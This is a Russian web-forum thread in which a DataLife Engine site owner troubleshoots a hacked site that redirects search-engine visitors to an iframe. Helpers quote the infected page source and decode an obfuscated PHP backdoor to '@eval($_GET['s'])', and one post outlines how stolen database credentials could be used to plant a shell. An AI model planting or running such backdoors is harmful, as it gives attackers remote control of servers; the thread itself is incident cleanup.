Бормотухи.НЕТ

Вернуться   Бормотухи.НЕТ > Web-мастеру > DataLife Engine
Расширенный поиск

DataLife Engine Скачать хаки для DLE, темы для DLE

Ответ
 
Опции темы Поиск в этой теме
Старый 21.10.2012, 16:50 Вверх   #1
Уважаемая личность
 
Аватар для noggano77777
noggano77777 вне форума
Доп. информация
По умолчанию Соединение было сброшено

Когда я перехожу с поиска Яндекса или Гугла, то сайт грузится, а затем сбрасывается. Когда захожу с закладок или сайта, то все нормально.

Вот если переходить на сайт с ПС.

Пример:Про звед (сбрасывает)

Если аходить на сайт без ПС.

Пример:
Про звезд

Как исправить ?
  Ответить с цитированием
Старый 21.10.2012, 18:37 Вверх   #2
Грамотный форумчанин
 
Аватар для jakal
jakal вне форума
Доп. информация
По умолчанию

может что то с ЧПУ ?
потому как на форум зайти с поиска то норм,
а сайт чего то перебрасывает, скорей всего ЧПУ, если не стоит какого то скрипта там.
  Ответить с цитированием
Старый 21.10.2012, 18:50 Вверх   #3
Местный житель
 
Аватар для old
old вне форума
Доп. информация
По умолчанию

Там редирект на IFRAME
view-source:http://secrecy.mooo.com/?RETURN=FALSE&IFRAME=FALSE&ID=40&TYPE=G
ниже какая-то партнерка

<tbody>
<tr>
<td valign="middle">Мы в топах</td>
<td width="10"></td>
<td valign="top"><noindex></noindex><script language="javascript" async defer src="http://uno.start-adv.info/?t=b&blockids=4265"></script><noindex><!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='http://www.liveinternet.ru/click' "+
"target=_blank><img src='//counter.yadro.ru/hit?t14.14;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet: показано число просмотров за 24"+
" часа, посетителей за 24 часа и за сегодня' "+
"border='0' width='88' height='31'><\/a>")
//--></script><!--/LiveInternet--></noindex>
<noindex><!--AdLayer.Mediatarget--><script type="text/javascript">
(function(){var s = document.createElement('script');
s.setAttribute('async', 'true'); s.src =
'http://sticker.yadro.ru/ad/slider.js?place=2648;rnd='+Math.random();
document.documentElement.firstChild.appendChild(s);})();
</script><!--/AdLayer.MediaTarget--></noindex>

<td width="10"></td>
<td valign="top"><noindex><script language="javascript" async defer src="http://under.toroo.info/?t=b&blockids=6920"></script></noindex>
</tr>
</tbody>
</table>

</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>


<a href="http://www.sexshop-vishenka.ru/category_1046.html" target="_blank">Самое сексуальное мужское белье</a>.

</body>

</html>

смотрите что в index.php, сравните с оригинальным файлом из чистого дистрибьютива,
так же желательно посмотреть что в .htaccess

Последний раз редактировалось old; 21.10.2012 в 18:58..
  Ответить с цитированием
Cказали cпасибо:
Старый 21.10.2012, 19:38 Вверх   #4
Уважаемая личность
 
Аватар для noggano77777
noggano77777 вне форума
Доп. информация
По умолчанию

Цитата Сообщение от old Посмотреть сообщение
смотрите что в index.php, сравните с оригинальным файлом из чистого дистрибьютива,
так же желательно посмотреть что в .htaccess
Куда еще могли залить ифрейм ?
  Ответить с цитированием
Старый 21.10.2012, 19:40 Вверх   #5
Местный житель
 
Аватар для old
old вне форума
Доп. информация
По умолчанию

куда угодно, возьмите скрипт для поиска шеллов, просканьте сервер/хост, обратитесь к специалистам.
  Ответить с цитированием
Старый 21.10.2012, 19:43 Вверх   #6
Уважаемая личность
 
Аватар для noggano77777
noggano77777 вне форума
Доп. информация
По умолчанию

Цитата Сообщение от old Посмотреть сообщение
куда угодно, возьмите скрипт для поиска шеллов, просканьте сервер/хост, обратитесь к специалистам.
Просканил, толку нет. Скрипт для поиска шелов не ай-болит ?

Скажите сервис онлайн по раскадировки этого кода:

Код:
@eval(base64_decode("QGV2YWwoJF9HRVRbJ3MnXSk7"));
Он похож

Последний раз редактировалось noggano77777; 21.10.2012 в 19:52..
  Ответить с цитированием
Старый 21.10.2012, 19:51 Вверх   #7
Местный житель
 
Аватар для old
old вне форума
Доп. информация
По умолчанию

можно и его
  Ответить с цитированием
Старый 21.10.2012, 19:53 Вверх   #8
Уважаемая личность
 
Аватар для noggano77777
noggano77777 вне форума
Доп. информация
По умолчанию

Цитата Сообщение от old Посмотреть сообщение
можно и его
Прочтите выше моё сообщения. Я добавил
  Ответить с цитированием
Старый 21.10.2012, 20:10 Вверх   #9
Местный житель
 
Аватар для old
old вне форума
Доп. информация
По умолчанию

Цитата Сообщение от noggano77777 Посмотреть сообщение
QGV2YWwoJF9HRVRbJ3MnXSk7
Result:
@eval($_GET['s']);
  Ответить с цитированием
Старый 23.10.2012, 13:33 Вверх   #10
Уважаемая личность
 
Аватар для noggano77777
noggano77777 вне форума
Доп. информация
По умолчанию

Вопрос решен. Закройте тему
  Ответить с цитированием
Старый 23.10.2012, 14:13 Вверх   #11
Грамотный форумчанин
 
Аватар для jakal
jakal вне форума
Доп. информация
По умолчанию

Цитата Сообщение от noggano77777 Посмотреть сообщение
Вопрос решен. Закройте тему
Может поделитесь как решили, а то может кто еще столкнется с таким.
  Ответить с цитированием
Старый 23.10.2012, 15:30 Вверх   #12
Уважаемая личность
 
Аватар для noggano77777
noggano77777 вне форума
Доп. информация
По умолчанию

Цитата Сообщение от jakal Посмотреть сообщение
Может поделитесь как решили, а то может кто еще столкнется с таким.
В фале dle_js1.js был код с ифреймом на сайт
  Ответить с цитированием
Старый 23.10.2012, 16:21 Вверх   #13
Грамотный форумчанин
 
Аватар для jakal
jakal вне форума
Доп. информация
По умолчанию

ясно, то есть это Ваш косяк, загрузили скрипт с iframe к себе на сайт.
  Ответить с цитированием
Старый 23.10.2012, 23:47 Вверх   #14
Уважаемая личность
 
Аватар для noggano77777
noggano77777 вне форума
Доп. информация
По умолчанию

Цитата Сообщение от jakal Посмотреть сообщение
ясно, то есть это Ваш косяк, загрузили скрипт с iframe к себе на сайт.
Нет, сайт был взломан
  Ответить с цитированием
Старый 24.10.2012, 08:57 Вверх   #15
Местный житель
 
Аватар для old
old вне форума
Доп. информация
По умолчанию

noggano77777, а Вы шелл/шеллы нашли, дыру, через которую залили шелл/айфрейм?
  Ответить с цитированием
Старый 24.10.2012, 09:46 Вверх   #16
Грамотный форумчанин
 
Аватар для jakal
jakal вне форума
Доп. информация
По умолчанию

скорей всего это Вы залили себе на сайт этот скрипт dle_js1.js с "вредоносным кодом",
а что бы никто не смог Вам его залить, выставляйте правильно права на папки и файлы.

p.s. Эти все предположения исходят из-за посещаемости Вашего сайта (при такой посещаемости думаю ни у кого нету желания его взламывать)
  Ответить с цитированием
Старый 24.10.2012, 14:46 Вверх   #17
Уважаемая личность
 
Аватар для noggano77777
noggano77777 вне форума
Доп. информация
По умолчанию

Цитата Сообщение от old Посмотреть сообщение
noggano77777, а Вы шелл/шеллы нашли, дыру, через которую залили шелл/айфрейм?
Могли залить ифрейм зная бд другого сайта ?

Цитата Сообщение от jakal Посмотреть сообщение
скорей всего это Вы залили себе на сайт этот скрипт dle_js1.js с "вредоносным кодом",
а что бы никто не смог Вам его залить, выставляйте правильно права на папки и файлы.
файл был скачан с одного источника. Не могло не как

Цитата Сообщение от old Посмотреть сообщение
p.s. Эти все предположения исходят из-за посещаемости Вашего сайта (при такой посещаемости думаю ни у кого нету желания его взламывать)
Посещаемость была 500-700 челов в день. Потом стала такая хз из-за чего !?
  Ответить с цитированием
Старый 24.10.2012, 15:22 Вверх   #18
Коварный тип
 
Аватар для Serberg
Serberg вне форума
Доп. информация
По умолчанию

Цитата Сообщение от noggano77777 Посмотреть сообщение
Могли залить ифрейм зная бд другого сайта ?
Теоретически можно, если все звезды на небе совпадут.
  Ответить с цитированием
Старый 24.10.2012, 17:08 Вверх   #19
Уважаемая личность
 
Аватар для noggano77777
noggano77777 вне форума
Доп. информация
По умолчанию

Цитата Сообщение от Serberg Посмотреть сообщение
Теоретически можно, если все звезды на небе совпадут.
А серьезно ? Грешу на это.
В одном скрипте было паливо на имя пользователя, имя бд и пароль.
  Ответить с цитированием
Старый 24.10.2012, 18:30 Вверх   #20
Грамотный форумчанин
 
Аватар для jakal
jakal вне форума
Доп. информация
По умолчанию

вот Вы сами логически подумайте, как можно через БД залить js файл? да еще если и права на папки не разрешают заливать а только просмотр?

а на счет БД
Могли залить ифрейм зная бд другого сайта ?
только в том случаи если у Вас на обеих сайтах одинаковые логин и пароль БД, и при том что тот взломщик это знал! иначе просто пробовать по всем сайтах один и тот логин и пароль подставлять что бы ломануть это тупо.
  Ответить с цитированием
Старый 24.10.2012, 18:33 Вверх   #21
Грамотный форумчанин
 
Аватар для jakal
jakal вне форума
Доп. информация
По умолчанию

и залить куда в БД! а у Вас как Вы сами сказали этот iframe был в dle_js1.js
здесь без вариантов, либо Вы сами залили этот скрипт, либо кто то знал на фтп данные вот и закинул в js файл. Хотя при этом вообще мог все снести.
  Ответить с цитированием
Старый 24.10.2012, 18:52 Вверх   #22
Уважаемая личность
 
Аватар для noggano77777
noggano77777 вне форума
Доп. информация
По умолчанию

Цитата Сообщение от jakal Посмотреть сообщение
и залить куда в БД! а у Вас как Вы сами сказали этот iframe был в dle_js1.js
здесь без вариантов, либо Вы сами залили этот скрипт, либо кто то знал на фтп данные вот и закинул в js файл. Хотя при этом вообще мог все снести.
А если узнать бд и зайти в папку user_dle и вынуть пароли. Это вариант.
Насчет ФТП возможно. Были взломана вся сетка сайтов
  Ответить с цитированием
Старый 24.10.2012, 19:15 Вверх   #23
Местный житель
 
Аватар для old
old вне форума
Доп. информация
По умолчанию

Варианты
1: через какую-либо уязвимость в движке/дополнениях к нему
2: Уязвимость в версии PMA
3: Не внимательность админа, к тому что он льет туда
4: Взломали через соседей
P.S. jakal, вы ошибаетесь, имея доступ к PMA можно мини-шелл/бэкдор залить, а уж дальше и полноценный.
  Ответить с цитированием
Старый 24.10.2012, 22:01 Вверх   #24
Коварный тип
 
Аватар для Serberg
Serberg вне форума
Доп. информация
По умолчанию

Цитата Сообщение от jakal Посмотреть сообщение
только в том случаи если у Вас на обеих сайтах одинаковые логин и пароль БД, и при том что тот взломщик это знал! иначе просто пробовать по всем сайтах один и тот логин и пароль подставлять что бы ломануть это тупо.
Не верно.
Например, я знаю логин и пароль соседнего сайта. Открываю базу, делаю себя админом. В некоторых случаях разрешаю загрузку типов файлов (в случае с некоторыми скриптами вообще не надо получать доступ к загрузке файлов, сразу в базу лью шел). Получаю полный доступ к ФС хостинг аккаунта. Лезу в соседний сайт, заливаю скрипт и прицепляю заразу.
Но это опять при том что все заезды должны сойтись )
  Ответить с цитированием
Cказали cпасибо:
Старый 25.10.2012, 22:25 Вверх   #25
Знаток
 
Аватар для apelisin
apelisin вне форума
Доп. информация
По умолчанию

Так и не решили проблему?
Касперский блочит сайт.
  Ответить с цитированием
Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Текущее время: 23:43. Часовой пояс GMT +3.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2024, vBulletin Solutions, Inc. Перевод: zCarot
 

Время генерации страницы 0.17929 секунды с 11 запросами